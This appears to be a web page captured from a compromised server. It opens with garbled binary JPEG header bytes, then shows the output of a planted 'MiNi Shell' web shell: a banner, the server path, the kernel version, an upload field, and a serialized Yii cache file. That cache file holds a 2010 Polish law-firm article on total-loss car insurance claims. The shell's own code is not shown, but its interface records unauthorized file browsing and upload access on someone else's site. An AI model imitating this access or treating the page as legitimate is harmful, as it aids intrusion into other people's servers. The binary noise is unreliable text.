JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/frontend/runtime/cache/7c/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/frontend/runtime/cache/7c/7ca5fd40df263ba36a398522d3096ce1.bin

a:2:{i:0;a:2:{i:0;s:8675:" 
                    
                    <h3 class="title" itemprop="headline">SZKODA CAŁKOWITA</h3>
                    <p><span class="glyphicon glyphicon-time" aria-hidden="true"></span> <strong itemprop="datePublished"> 02-09-2010, 00:00</strong>
                        <meta itemprop="dateModified" content=" 02-09-2010, 00:00"/>
                        <div class="hide" itemprop="description">
	Na początek naszego cyklu artykuł&oacute;w proponujemy temat rozliczenia szkody komunikacyjnej jako szkody&nbsp; całkowitej. Nasza kancelaria od wielu lat zajmuje się sporami z Towarzystwami Ubezpieczeniowymi i uzyskiwaniem od nich należnych,&nbsp; a niewypłaconych odszkodowań komunikacyjnych (OC AC), oraz majątkowych&nbsp; (pożary, zalania , kradzieże). Definicja szkody całkowitej wg Og&oacute;lnych Warunk&oacute;w Ubezpieczenia AC jest podobna w większości towarzystw.</div>
                        <div class="hide" itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
                            <meta itemprop="name" content="budowa.org">
                            <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
                                <meta itemprop="url" content="https://www.budowa.org/images/loga/budowa.jpg">
                            </div>
                        </div>
                        <div class="hide" itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
                            <meta itemprop="url" content="https://common.v-manager.pl/">
                        </div>
                        <meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://www.budowa.org/artykuly/szczegoly/40014"/>
                        
                                        </p>

                    <div class="lorem">
                        <p>
	<strong>Na początek naszego cyklu artykułów proponujemy temat rozliczenia szkody komunikacyjnej jako szkody  całkowitej. </strong></p>
<p>
	Nasza kancelaria od wielu lat zajmuje się sporami z Towarzystwami Ubezpieczeniowymi i uzyskiwaniem od nich należnych,  a niewypłaconych odszkodowań komunikacyjnych ( OC AC ), oraz majątkowych  ( pożary, zalania , kradzieże ). Definicja szkody całkowitej wg Ogólnych Warunków Ubezpieczenia AC jest podobna w większości towarzystw.</p>
<p>
	Rozliczenie takie można zastosować, jeśli koszt naprawy przekroczy 70% wartości auta, lub naprawa jest nieuzasadniona ekonomicznie. TU powinno wtedy wypłacić różnicę między wartością auta przed szkodą i wraku po wypadku. Sumy te zależą od decyzji TU, a wartość auta przed wypadkiem różni się od tej na polisie, choćby szkoda zdarzyła się tydzień po zawarciu AC czy OC. Zawyża się wartość wraku po wypadku, więc wypłata nie wystarcza do naprawy auta.</p>
<p>
	<u>Oto przykład:</u> Auto warte ok. 30 tys. wg polisy, po wypadku wyceniono w TU na 23 tys.! W ASO zaproponowano naprawę za 16,5 tys., (choć w  innych warsztatach naprawa będzie o 30 % tańsza), co pozwala zaliczyć szkodę jako całkowitą. Pozostałości wyceniono na 14,5 tys. i do wypłaty zostało 8,5 tys. (prawie połowa z wyliczonej kwoty  ASO). Klient dostaje ofertę odkupienia pozostałości za 18 tys. zł i do wypłaty zostaje tylko 5 tys. zł. Tego rodzaju wyliczenia  zawarte są w OWU AC i klient podpisując polisę musi je zaakceptować, ale w przypadku  szkody z OC, sprawa wygląda inaczej. Kodeks Cywilny mówi jasno, że klientowi należy się pełny zwrot kosztów pojazdu w pełnej wartości, a nie ograniczony do 70 % . Wg przepisów, towarzystwo nie musi przejąć uszkodzonego pojazdu, może zdecydować o tym na wniosek poszkodowanego, w oparciu o  art.1a ust. 3 ustawy z dn. 28 lipca 1990r. o działalności ubezpieczeniowej (jednolity tekst Dz. U.  z 1996r. nr 11, poz. 62 z późn. zm.).</p>
<p>
	Warunki likwidacji szkód z ubezpieczenia OC  nie mogą być sprzeczne z Kodeksem Cywilnym, który mówi, że naprawienie szkody winno nastąpić według wyboru poszkodowanego, przez przywrócenie stanu z przed wypadku, bądź przez zapłatę odszkodowania. Decyzja o naprawie szkody powinna więc być przedmiotem porozumienia obu stron, a nie jednostronnie narzucona przez TU. Jeżeli klient zdecyduje się na rozliczenie rachunkami, a ich suma nie przekroczy wartości pojazdu, należy mu się pełne odszkodowanie i pokrycie wydatków  na naprawę pojazdu. Oczywiście TU ignorują to i rozliczenia zależą od uznania ich pracowników.</p>
<p>
	Nie należy się z tym  zgadzać i tolerować tak jaskrawego przejawu naruszenia praw klientów oraz bezzasadnego bogacenia się TU naszym kosztem . Nie po to płacimy niemałe składki, żeby  potem mieć z tego powodu poważne kłopoty. Ubezpieczenie OC jest niestety obowiązkowe, a klienci mogą przynajmniej żądać odszkodowania od ubezpieczyciela sprawcy kolizji.</p>
<p>
	Porad naszym czytelnikom udzielają mgr Janusz Cymer i mgr Jacek Gęga z Kancelarii Prawnej „Kurier” al. W. Beliny-Prażmowskiego 49a  31-514 Kraków.</p>
<p>
	Czytelników zainteresowanych tym tematem prosimy o kontakt z redakcją . Jeżeli nasz artykuł wzbudził zainteresowanie Państwa,  przygotujemy kolejne dotyczące tego zagadnienia.</p>                        
                         


                           
                    </div>
                    
                    <div class="text-center">
                                        </div>

                                            
                      
                        
                        
                    
                                        <div class="portal-light-background p1em mt1" itemprop="author" itemscope itemtype="https://schema.org/Person">
                        <strong>Źródło:</strong> 
                        <span itemprop="name">
                                                            <a href="http://www.kancelaria.kuriergc.pl" target="_blank">
                                                    
                            Kancelaria Prawna Kurier                                                        
                                                            </a>
                                                    </span>
                        <br>
                    </div>
                                        
                                            <div class="nav-table tags mt05">
                            <div>Tagi:</div>    
                            <div>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=szkoda+całkowita" class="label label-default">szkoda całkowita</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=ubezpieczenie+OC" class="label label-default">ubezpieczenie OC</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=AC" class="label label-default">AC</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=odszkodowania+komunikacyjne" class="label label-default">odszkodowania komunikacyjne</a>
                                                            </div>
                        </div>
                                            
                        
                    <div id="fb-root"></div>
                    <!--script async defer crossorigin="anonymous" src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0" nonce="2g9iczzS"></script-->
                    
<script>
//<![CDATA[
var lx=!1;window.addEventListener("scroll",function(){(0!=document.documentElement.scrollTop&&!1===lx||0!=document.body.scrollTop&&!1===lx)&&(!function(){var e=document.createElement("script");e.type="text/javascript",e.async=!0,e.src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(e,a)}(),lx=!0)},!0);
//]]>
</script>
                    
                    <div class="social text-center mb1">
                        <div class="fb-like" data-href="https://www.budowa.org/artykuly/szczegoly/40014_szkoda-calkowita" data-width="" data-layout="button" data-action="like" data-show-faces="false" data-share="true"></div>
                    </div>

                    
                    <div id="articles">    
                        
                    
                                    ";i:1;N;}i:1;O:25:"yii\caching\TagDependency":3:{s:4:"tags";a:2:{i:0;s:13:"article_40014";i:1;s:8:"articles";}s:4:"data";a:2:{s:32:"aca30f88961af53fed72a5ee02c44717";s:21:"0.22281800 1748615815";s:32:"9f4ebfa1b76d6bc6617aec9034853422";s:21:"0.22954000 1749980350";}s:8:"reusable";b:0;}}

Creat By MiNi SheLL
Email: jattceo@gmail.com